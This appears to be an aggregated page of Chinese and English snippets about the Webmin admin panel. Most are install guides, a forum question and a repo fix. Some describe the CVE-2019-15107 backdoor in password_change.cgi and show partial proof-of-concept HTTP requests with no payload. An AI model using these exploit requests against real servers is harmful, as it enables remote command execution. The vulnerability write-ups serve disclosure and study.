webmin

0x00 前言 本来前一阵就想复现来着，但是官网的版本已经更新了，直到今天才发现Docker上有环境，才进行了复现 0x01影响版本 Webmin<=1.920 0x02 环境搭建 docker search webmin docker pull piersonjarvis / webmin - samba docker run - d - p 10000 : 80 piersonjarvis / webmin - samba 访问你的ip:10000即可访问1.920版本的webmin 使用账号密码： root/webmin登录到后台 开启密码重置功能： Webmin--Webmin confuration--Authentication 0x03 漏洞利用 经过长时间的寻找，未找到修改密码的接口，所以随便抓个包手动构造了一个，数据包如下： POST / password_change . cgi HTTP / 1.1 Host : 136.244 . xx . xx : 10000 User - Agent : Mozilla / 5.0 ( Windows NT 10.0 ; Win64 ; x64 ; rv : 68.0 ) Gecko / 20100101 Firefox / 68.0Accept : text / html , * 最终执行命令成功 参考文章：

第七节课： Apache 服务器配置 Apache是世界使用排名第一的Web 服务器 软件 。 百度百科 ： https://baike.baidu.com/item/Apache/6265 wikipedia ： https://zh.wikipedia.org/wiki/Apache_HTTP_Server 安装Apache服务 与之前类似，先将光盘挂载 进入Server寻找安装包 rpm -ivh httpd-2.2.3-63.el5.i386.rpm :安装主程序包 （这里可能会出现安装失败，要求安装依赖关系，按照提示安装好依赖关系后， 再次 安装主程序即可） 我之前安装过，所以不会出现这个问题 service httpd start :启动服务 下一步我们要验证是否成功，在浏览器中输入虚拟机的ip地址，出现Apache欢迎页则成功 接下来安装webmin 我们将webmin直接拉入到虚拟机 webmin 在/root/Desktop 下 rpm -ivh /root/Desktop/webmin-1.350-1.noarch.rpm :安装 重启httpd服务 在浏览器中输入ip：10000，出现如下界面 root用户登录，修改一下语言 开始主服务器配置 大概意思如下图 超时时间设置为300 秒 设置客户连接数最大为500 这里是管理员的邮件地址 没有域名可以改为ip

什么是Virtualmin面板 对一些Linxu操作不太熟悉的用户可以在VPS上安装web控制面板来简化添加网站或数据库等操作,常用的有cPanel、DirectAdmin、Virtualmin/Webmin、Kloxo这几种web控制面板,但是cPanel、DirectAdmin、Kloxo都是收费的控制面板,并且比较占用系统内存和资源,一般被空间销售商用作虚拟空间的销售;Virtualmin/Webmin是一款免费并且占用系统资源比较小的web控制面板,非常适合在VPS上安装。Hi-VPS强烈建议安装Virtualmin/Webmin作为VPS上的web控制面板. Virtualmin面板和Webmin的区别 Virtualmin是在Webmin基础上的一个网站管理组建.如果只安装Webmin的话,用户就可以通过Webmin来手工添加apahce虚拟网站或者添加数据库,添加FTP用户等,但是要完整的完成添加一个网站需要很多用户创建,权限管理等繁琐的操作,极其容易操作失误导致失败.Virtualmin是在Webmin基础上自动化添加网站的组建,只要简单的输入需要添加的域名后,Virtualmin能够自动的创建数据库,添加FTP用户等,用户直接按照创建的FTP用户名上传网站文件到对应的目录中后即可. 如何在Hi-VPS的VPS上安装Virtualmin面板 目前Hi

I followed DigitalOcean's tutorials on how to set up your server with SSH, creating a new user, firewalls etc. The first tutorial in the series is linked under: https://www.digitalocean.com/community/tutorials/how-to-connect-to-your-droplet-with-ssh I've also installed Webmin on my server, but I still can't get a connection to the server by using the web-browser. It just loads for a long time and then says it can't establish a connection. The URL's I've been using are: "Just-my-IP-adress" and " https://Just-my-IP-adress:10000 " The last one to open the Webmin administrator. I'm not sure what

在安装webmin面板的时候到最后出现了安装错误的提示.然后更新源时发现 Vim Error: Cannot retrieve metalink for repository: epel. Please verify its path and try again 主要是源文件有点问题,解决方案如下 解决方案 首先编辑文件 Vim vim /etc/yum.repos.d/epel.repo 将 [epel] name=Extra Packages for Enterprise Linux 6 - $basearch #baseurl=http://download.fedoraproject.org/pub/epel/6/$basearch mirrorlist=htt ps ://mirrors.fedoraproject.org/metalink?repo=epel-6&arch=$basearch 修改为 [epel] name=Extra Packages for Enterprise Linux 6 - $basearch baseurl=http://download.fedoraproject.org/pub/epel/6/$basearch #mirrorlist=https://mirrors.fedoraproject.org/metalink?repo

Webmin是一个基于Web的Unix系统管理界面。使用任何现代Web浏览器，您都可以设置用户帐户、Apache、DNS、文件共享等等。Webmin消除了手工编辑Unix配置文件(如/etc/passwd)的需要，并允许您从控制台或远程管理系统。说白了webwin就是一个远程的管理工具，它的优点是可以远程利用图形界面连接Linux（CentOS）并管理它。 Webmin 最新版本是 1.930。 更新修复了一个安全漏洞，应该由所有用户立即安装。虽然在使用默认配置的Webmin安装中无法利用，但强烈建议进行升级。 软件包官方网站。http://www.webmin.com/话不多说我们开始安装它，首先我们要打开虚拟机用WinSCP把这个安装包上传到Linux的系统当中去。 也可以进入Linux系统，直接[linuxidc@localhost www.linuxidc.com]$ wget https://nchc.dl.sourceforge.net/project/webadmin/webmin/1.930/webmin-1.930.tar.gz 来源： https://www.cnblogs.com/liuhui-xzz/p/11524339.html

https://www.cnblogs.com/osfipin/p/5948803.html 这两天公众号都在手这个小工具， 今天早上试了下 挺好用的 还看到了启动 samba 的方法。 一会儿 再学习一下 samba Webmin 安装 (centos7 rpm 方式) 20170112更新：当前最新版本：webmin-1.831-1.noarch。 网上有很多此类的教程，大多都很老了。这里记录下自己安装Webmin的过程。 # 系统准备 > yum -y install perl perl-Net-SSLeay openssl perl-IO-Tty # 下载 > wget http://prdownloads.sourceforge.net/webadmin/webmin-1.820-1.noarch.rpm -O webmin-current.rpm # 安装 > rpm -U webmin-current.rpm # 访问 > 浏览器打开 https://ip地址:10000/ > 使用管理员用户和密码登录(即root) # 本地虚拟机登录后截图 # 相关链接 官方下载页面：http://www.webmin.com/download.html rpm安装方式：http://www.webmin.com/rpm.html 浏览器集合： http://browsehappy

　　Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 利用条件：webmin <= 1.910 原因：官网 SourceForge代码中存在漏洞，github代码中无漏洞，为后门植入，不得不佩服这些老外真会玩，看了一堆大神分析，自己简单记录下。 前面参数传递暂时不提，看下面这段代码，在perl代码中 qx/ `` 　等价于``,小伙伴们明白了吧，提交参数old，命令执行，但是你这样看不到回显，所有前面又加了&pass_error报错命令回显，emmm就造成了RCE。 　后门藏的太浅了 漏洞利用exp代码（刚码好，Please give me a star,old iron) https://github.com/AdministratorGithub/CVE-2019-15107 来源： https://www.cnblogs.com/junsec/p/11402150.html

简单介绍： 　　 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统，这些系统除了各种版本的linux以外还包括：AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。Webmin 能够在远程使用支持 HTTPS协议的 Web 浏览器通过 Web 界面管理主机。 漏洞原理 ：在重置密码功能password_changge.cgi中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码 影响版本： 一直到最新的1.920版本，存在于更换用户密码这个功能中。 poc： POST /password_changge.cgi HTTP/1.1 Host: host:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3